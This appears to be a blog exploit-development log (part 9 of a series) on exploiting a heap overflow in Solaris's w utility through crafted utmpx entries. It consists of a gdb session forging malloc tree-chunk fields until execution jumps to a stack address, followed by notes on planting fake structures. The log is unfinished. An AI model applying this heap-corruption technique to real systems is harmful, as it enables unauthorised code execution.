bazz pts/2 7:23pm 28 /home/bazz/w_32
bazz pts/3 7:34pm 55 52 /home/bazz/w_32
bazz pts/4 7:47pm 12 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) del 2
No breakpoint number 2.
(gdb) i b
Num Type Disp Enb Address What
1 breakpoint keep y 0x00011114 <main+592>
breakpoint already hit 1 time
3 hw watchpoint keep y *219472
breakpoint already hit 24 times
(gdb) del 3
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFF001
(gdb) c
Continuing.
8:03pm up 595 day(s), 6:12, 4 users, load average: 0.09, 0.13, 0.08
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 51 /home/bazz/w_32
bazz pts/2 7:23pm 29 /home/bazz/w_32
bazz pts/3 7:34pm 56 47 /home/bazz/w_32
bazz pts/4 7:47pm 13 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x00000000
(gdb) c
Continuing.
8:03pm up 595 day(s), 6:13, 4 users, load average: 0.06, 0.12, 0.07
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 51 /home/bazz/w_32
bazz pts/2 7:23pm 29 /home/bazz/w_32
bazz pts/3 7:34pm 56 47 /home/bazz/w_32
bazz pts/4 7:47pm 13 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x00400000
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#2 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3 0xff2b624c in calloc () from /usr/lib/libc.so.1
#4 0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#5 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#6 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#7 0x00011e8c in main ()
#8 0x00011144 in main ()
(gdb) x/x 0xff2c2514
0xff2c2514 <realfree+264>: 0xf626c008
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
(gdb) p/x $i3 + $o0
$1 = 0x435950
(gdb) x/x 0x435950
0x435950: Cannot access memory at address 0x435950
(gdb) p/x $i3
$2 = 0x33050
(gdb) x/x $i3
0x33050: 0x00402900
(gdb) x/10i 0xff2c2514-0x20
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>: ld [ %i3 ], %o7
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35480
0x35480: 0x00000000 0x00000000 0x00000000
(gdb) x/3x 0x35948
0x35948: 0x00035030 0x00000000 0x00000003
(gdb) x/x 0x35030
0x35030: 0x00000918
(gdb) x/x 0x35030-8
0x35028: 0x6c627574
(gdb) set *0x35030=0x41414100
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1 0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4 0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5 0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6 0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8 0x00011e8c in main ()
#9 0x00011144 in main ()
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
(gdb) p/x $i3
$3 = 0x33020
(gdb) p/x $i3+$o0
$4 = 0x41449130
(gdb) x/x 0x33020
0x33020: 0x41416110
(gdb) x/48i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>: clr [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>: ld [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>: call 0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>: mov %i0, %o0
0xff2c24e4 <realfree+216>: ld [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>: mov %i0, %i3
0xff2c24ec <realfree+224>: ld [ %i0 ], %o1
0xff2c24f0 <realfree+228>: ld [ %i1 ], %o4
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>: ld [ %i3 ], %o7
0xff2c251c <realfree+272>: ld [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>: add %i3, %o7, %g1
0xff2c2524 <realfree+280>: ld [ %o0 ], %o0
0xff2c2528 <realfree+284>: add %g1, 0x10, %o1
0xff2c252c <realfree+288>: cmp %o1, %o0
0xff2c2530 <realfree+292>: bne 0xff2c2544 <realfree+312>
0xff2c2534 <realfree+296>: ld [ %i2 + 0x4ac ], %o0
0xff2c2538 <realfree+300>: st %i3, [ %o0 ]
0xff2c253c <realfree+304>: b 0xff2c265c <realfree+592>
0xff2c2540 <realfree+308>: ld [ %g1 + 8 ], %o0
0xff2c2544 <realfree+312>: cmp %o4, 0
0xff2c2548 <realfree+316>: be 0xff2c2654 <realfree+584>
0xff2c254c <realfree+320>: add %i3, 0x20, %o1
0xff2c2550 <realfree+324>: mov %o4, %g1
0xff2c2554 <realfree+328>: add %i3, 0x18, %o2
---Type <return> to continue, or q <return> to quit---
0xff2c2558 <realfree+332>: ld [ %g1 ], %o0
0xff2c255c <realfree+336>: add %i3, 0x10, %o3
0xff2c2560 <realfree+340>: cmp %o0, %o7
0xff2c2564 <realfree+344>: bleu 0xff2c259c <realfree+400>
0xff2c2568 <realfree+348>: nop
0xff2c256c <realfree+352>: ld [ %g1 + 0x10 ], %o0
0xff2c2570 <realfree+356>: cmp %o0, 0
0xff2c2574 <realfree+360>: be,a 0xff2c2588 <realfree+380>
0xff2c2578 <realfree+364>: st %i3, [ %g1 + 0x10 ]
0xff2c257c <realfree+368>: mov %o0, %g1
0xff2c2580 <realfree+372>: b 0xff2c2560 <realfree+340>
0xff2c2584 <realfree+376>: ld [ %g1 ], %o0
0xff2c2588 <realfree+380>: ld [ %i3 ], %o0
0xff2c258c <realfree+384>: st %g1, [ %i3 + 8 ]
0xff2c2590 <realfree+388>: add %i3, %o0, %g1
(gdb) x/12i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>: clr [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>: ld [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>: call 0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>: mov %i0, %o0
0xff2c24e4 <realfree+216>: ld [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>: mov %i0, %i3
0xff2c24ec <realfree+224>: ld [ %i0 ], %o1
0xff2c24f0 <realfree+228>: ld [ %i1 ], %o4
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
(gdb)
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>: ld [ %i3 ], %o7
0xff2c251c <realfree+272>: ld [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>: add %i3, %o7, %g1
0xff2c2524 <realfree+280>: ld [ %o0 ], %o0
0xff2c2528 <realfree+284>: add %g1, 0x10, %o1
0xff2c252c <realfree+288>: cmp %o1, %o0
0xff2c2530 <realfree+292>: bne 0xff2c2544 <realfree+312>
(gdb) x/3x 0x35948
0x35948: 0x00035030 0x00000000 0x00000003
(gdb) bt
#0 0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1 0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4 0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5 0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6 0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8 0x00011e8c in main ()
#9 0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35948
0x35948: 0x00035030 0x00000000 0x00000003
(gdb) set *0x35948=0xffbee000
(gdb) c
Continuing.
8:15pm up 595 day(s), 6:25, 4 users, load average: 0.00, 0.02, 0.04
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 1:03 /home/bazz/w_32
bazz pts/2 7:23pm 42 /home/bazz/w_32
bazz pts/3 7:34pm 56 47 /home/bazz/w_32
bazz pts/4 7:47pm 26 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35948
0x35948: 0x00035030 0x00000000 0x00000003
(gdb) set *0x35948=0xffbee000
(gdb) set *0x35950=0x0000
(gdb) c
Continuing.
8:17pm up 595 day(s), 6:26, 4 users, load average: 0.00, 0.01, 0.04
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 1:05 /home/bazz/w_32
bazz pts/2 7:23pm 43 /home/bazz/w_32
bazz pts/3 7:34pm 57 48 /home/bazz/w_32
bazz pts/4 7:47pm 27 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0xffbee000
(gdb) set *0x35950=0xffbee000
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) x/32i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>: clr [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>: ld [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>: call 0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>: mov %i0, %o0
0xff2c24e4 <realfree+216>: ld [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>: mov %i0, %i3
0xff2c24ec <realfree+224>: ld [ %i0 ], %o1
0xff2c24f0 <realfree+228>: ld [ %i1 ], %o4
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>: ld [ %i3 ], %o7
0xff2c251c <realfree+272>: ld [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>: add %i3, %o7, %g1
0xff2c2524 <realfree+280>: ld [ %o0 ], %o0
0xff2c2528 <realfree+284>: add %g1, 0x10, %o1
0xff2c252c <realfree+288>: cmp %o1, %o0
0xff2c2530 <realfree+292>: bne 0xff2c2544 <realfree+312>
0xff2c2534 <realfree+296>: ld [ %i2 + 0x4ac ], %o0
0xff2c2538 <realfree+300>: st %i3, [ %o0 ]
0xff2c253c <realfree+304>: b 0xff2c265c <realfree+592>
0xff2c2540 <realfree+308>: ld [ %g1 + 8 ], %o0
0xff2c2544 <realfree+312>: cmp %o4, 0
0xff2c2548 <realfree+316>: be 0xff2c2654 <realfree+584>
0xff2c254c <realfree+320>: add %i3, 0x20, %o1
0xff2c2550 <realfree+324>: mov %o4, %g1
(gdb) x/16i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>: clr [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>: ld [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>: call 0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>: mov %i0, %o0
0xff2c24e4 <realfree+216>: ld [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>: mov %i0, %i3
0xff2c24ec <realfree+224>: ld [ %i0 ], %o1
0xff2c24f0 <realfree+228>: ld [ %i1 ], %o4
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
(gdb) x/17i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>: clr [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>: ld [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>: call 0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>: mov %i0, %o0
0xff2c24e4 <realfree+216>: ld [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>: mov %i0, %i3
0xff2c24ec <realfree+224>: ld [ %i0 ], %o1
0xff2c24f0 <realfree+228>: ld [ %i1 ], %o4
0xff2c24f4 <realfree+232>: add %o0, 8, %o0
0xff2c24f8 <realfree+236>: add %o1, %o0, %o0
0xff2c24fc <realfree+240>: st %o0, [ %i0 ]
0xff2c2500 <realfree+244>: clr [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>: ld [ %i3 ], %o0
0xff2c2508 <realfree+252>: clr [ %i3 + 0x18 ]
0xff2c250c <realfree+256>: clr [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>: clr [ %i3 + 8 ]
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
(gdb) x/x $i3
0x33050: 0xffbf0900
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/x Lfree
0x33028: 0x00000000
(gdb) x/x Lfree-8
0x33020: 0x00002009
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 4
(gdb) c
Continuing.
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 5 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 5, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/x Lfree
0x33028: 0x00000000
(gdb) x/x &Lfree
0xff34284c <Lfree>: 0x00033028
(gdb) x/x Lfree
0x33028: 0x00000000
(gdb) x/x Lfree-8
0x33020: 0x00002009
(gdb) shell
This shell is interactive
lbazz@blade72[pts/3][~] ls -l /var/adm/utmpx
-rw-r--r-- 1 root root 11K Nov 1 19:47 /var/adm/utmpx
bazz@blade72[pts/3][~] which ls
/home/bazz/tools/bin/ls
bazz@blade72[pts/3][~] /bin/ls -l /var/adm/utmpx
-rw-r--r-- 1 root root 10416 Nov 1 19:47 /var/adm/utmpx
bazz@blade72[pts/3][~] exit
exit
(gdb) p/x $i0
$5 = 0xb
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#3 0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#4 0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#5 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6 0x00011e8c in main ()
#7 0x00011144 in main ()
(gdb) x/x Lfree-8
0x33020: 0x00002009
(gdb) x/x 0x35028
0x35028: 0x6c627574
(gdb) x/x 0x35028+8
0x35030: 0x00000918
(gdb) x/96x 0x35000
0x35000: 0x00000000 0x00000000 0x00000000 0x00000000
0x35010: 0x00000000 0x00000000 0x00000000 0x00000000
0x35020: 0x00000000 0x64687572 0x6c627574 0x00000000
0x35030: 0x00000918 0x00000000 0x00000000 0x00000000
0x35040: 0x00000000 0x00000000 0x00000000 0x00000000
0x35050: 0x00000000 0x00000000 0x00000000 0x00000000
0x35060: 0x00000000 0x00000000 0x00000000 0x00000000
0x35070: 0x00000000 0x00000000 0x00000000 0x00000000
0x35080: 0x00000000 0x00000000 0x00000000 0x00000000
0x35090: 0x00000000 0x00000000 0x00000000 0x00000000
0x350a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x350f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x35100: 0x00000000 0x00000000 0x00000000 0x00000000
0x35110: 0x00000000 0x00000000 0x00000000 0x00000000
0x35120: 0x00000000 0x00000000 0x00000000 0x00000000
0x35130: 0x00000000 0x00000000 0x00000000 0x00000000
0x35140: 0x00000000 0x00000000 0x00000000 0x00000000
0x35150: 0x00000000 0x00000000 0x00000000 0x00000000
0x35160: 0x00000000 0x00000000 0x00000000 0x00000000
0x35170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) set *0x35030 = 0x41000918
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1 0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4 0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5 0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6 0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8 0x00011e8c in main ()
#9 0x00011144 in main ()
(gdb) p/x $i2
$6 = 0xff33c008
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>: st %i3, [ %i3 + %o0 ]
(gdb) p/x $i3
$7 = 0x33020
(gdb) p/x $o0
$8 = 0x41002928
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 5, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 5
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
8:38pm up 595 day(s), 6:47, 4 users, load average: 0.00, 0.01, 0.02
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 1:26 /home/bazz/w_32
bazz pts/2 7:23pm 1:04 /home/bazz/w_32
bazz pts/3 7:34pm 57 48 /home/bazz/w_32
bazz pts/4 7:47pm 48 1 /home/bazz/tools/bin/bash
Program exited normally.
(gdb) c
The program is not being run.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/x 0x35030
0x35030: 0x00000918
(gdb) set *0x35030 = 0xffffffc8
(gdb) set *0x35000 = 0xfffffff8
(gdb) set *0x35004 = 0x41414141
(gdb) set *0x35008 = 0xff3ee248
(gdb) set *0x3500c = 0x41414141
(gdb) set *0x35010 = 0xffffffff
(gdb) set *0x35014 = 0x41414141
(gdb) set *0x35018 = 0x41414141
(gdb) set *0x3501c = 0x41414141
(gdb) set *0x35020 = 0xffbeef08
(gdb) set *0x35024 = 0x41414141
(gdb) set *0x35028 = 0x41414141
(gdb) set *0x3502c = 0x41414141
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2890 in t_delete () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2890 in t_delete () from /usr/lib/libc.so.1
#1 0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#2 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#3 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4 0xff2b624c in calloc () from /usr/lib/libc.so.1
#5 0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#6 0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#7 0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8 0x00011e8c in main ()
#9 0x00011144 in main ()
(gdb) x/i 0xff2c2890
0xff2c2890 <t_delete+56>: st %o1, [ %o0 + 0x20 ]
(gdb) p/x $o0
$9 = 0xff3ee248
(gdb) p/x $o0+20
$10 = 0xff3ee25c
(gdb) x/x 0xff3ee25c
0xff3ee25c: Cannot access memory at address 0xff3ee25c
(gdb) shell
This shell is interactive
bazz@blade72[pts/3][~] nm -x /lib/ld.so
ld.so ld.so.1
bazz@blade72[pts/3][~] nm -x /lib/ld.so
ld.so ld.so.1
bazz@blade72[pts/3][~] nm -x /lib/ld.so.1 | grep jmp
nm: invalid option -- x
Usage: nm [option(s)] [file(s)]
List symbols in [file(s)] (a.out by default).
The options are:
-a, --debug-syms Display debugger-only symbols
-A, --print-file-name Print name of the input file before every symbol
-B Same as --format=bsd
-C, --demangle[=STYLE] Decode low-level symbol names into user-level names
The STYLE, if specified, can be `auto' (the default),
`gnu', `lucid', `arm', `hp', `edg', `gnu-v3', `java'
or `gnat'
--no-demangle Do not demangle low-level symbol names
-D, --dynamic Display dynamic symbols instead of normal symbols
--defined-only Display only defined symbols
-e (ignored)
-f, --format=FORMAT Use the output format FORMAT. FORMAT can be `bsd',
`sysv' or `posix'. The default is `bsd'
-g, --extern-only Display only external symbols
-l, --line-numbers Use debugging information to find a filename and
line number for each symbol
-n, --numeric-sort Sort symbols numerically by address
-o Same as -A
-p, --no-sort Do not sort the symbols
-P, --portability Same as --format=posix
-r, --reverse-sort Reverse the sense of the sort
-S, --print-size Print size of defined symbols
-s, --print-armap Include index for symbols from archive members
--size-sort Sort symbols by size
--special-syms Include special symbols in the output
--synthetic Display synthetic symbols as well
-t, --radix=RADIX Use RADIX for printing symbol values
--target=BFDNAME Specify the target object format as BFDNAME
-u, --undefined-only Display only undefined symbols
-X 32_64 (ignored)
@FILE Read options from FILE
-h, --help Display this information
-V, --version Display this program's version number
nm: supported targets: elf32-sparc-sol2 elf64-sparc-sol2 a.out-sunos-big elf64-little elf64-big elf32-little elf32-big srec symbolsrec verilog tekhex binary ihex
bazz@blade72[pts/3][~] nm /lib/ld.so.1 | grep jmp
00030234 d thr_jmp_table
bazz@blade72[pts/3][~] exit
exit
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35030 = 0xffffffc8
(gdb) set *0x35000 = 0xfffffff8
(gdb) set *0x35004 = 0x41414141
(gdb) set *0x35008 = 0xff3e0214
(gdb) set *0x3500c = 0x41414141
(gdb) set *0x35010 = 0xffffffff
(gdb) set *0x35014 = 0x41414141
(gdb) set *0x35018 = 0x41414141
(gdb) set *0x3501c = 0x41414141
(gdb) set *0x35020 = 0xffbeef08
(gdb) set *0x35024 = 0x41414141
(gdb) set *0x35028 = 0x41414141
(gdb) set *0x3502c = 0x41414141
(gdb) c
Continuing.
Program received signal SIGILL, Illegal instruction.
0xffbeef08 in ?? ()
(gdb)
Posted in Uncategorized
Hacking a temporary “W(1)” — pt. 9
gcc -L/opt/csw/lib w_hacked.c -lintl export LD_LIBRARY_PATH="/opt/csw/lib"
In order to do this exploit properly, 2 UTMPX entries will need to be used. 1 is the “last” one in the table and it must be pre-destined before takeoff. In other words, must be setup before calling “W.” It is where the fake TREE structure will go. FAKE tree struct is 0x30, 48d bytes.
struct utmpx {
char ut_user[32]; /* user login name */
char ut_id[4]; /* inittab id */
char ut_line[32]; /* device name (console, lnxx) */
Wow!! What luck! 36 bytes, just enough to fit in the best data available to mankind before the line variable, which is a real POTA to get by the checks..NICE..
struct utmpx {
char ut_user[32]; /* user login name */
char ut_id[4]; /* inittab id */
char ut_line[32]; /* device name (console, lnxx) */
pid_t ut_pid; /* process id */
short ut_type; /* type of entry */
#if !defined(_XPG4_2) || defined(__EXTENSIONS__)
struct exit_status ut_exit; /* process termination/exit status */
#else
struct ut_exit_status ut_exit; /* process termination/exit status */
#endif
struct timeval ut_tv; /* time entry was made */
int ut_session; /* session ID, used for windowing */
#if !defined(_XPG4_2) || defined(__EXTENSIONS__)
int pad[5]; /* reserved for future use */
#else
int __pad[5]; /* reserved for future use */
#endif
short ut_syslen; /* significant length of ut_host */
/* including terminating null */
char ut_host[257]; /* remote host name */
};
Need to get proper size…
-bash-3.00$ cat sizeof_struct_tmpx.c
#include <utmpx.h>
main()
{
printf ("sizeof struct utmpx = 0x%x", sizeof(struct utmpx));
}
-bash-3.00$ ./sizeof_struct_tmpx
sizeof struct utmpx = 0x174
The 2nd structure.. well all it really needs to hold is something in the first word ; )
0x174 + 8 .. The +8 is on account of the malloc behavior..
(0x17c ^ 0xFFFFFFFF) +1 = 0xFFFFFE84 <- that's the value for the 2nd UTMPX entry name field. Anything else there is junk.
Welp, I leave off realizing oddly that the heap over-write point is like 17 utemp entries extra than anticipated... and.. the written value isn't doing what I expect.. so I need to go through in the debugger... for another day...
Posted in Uncategorized
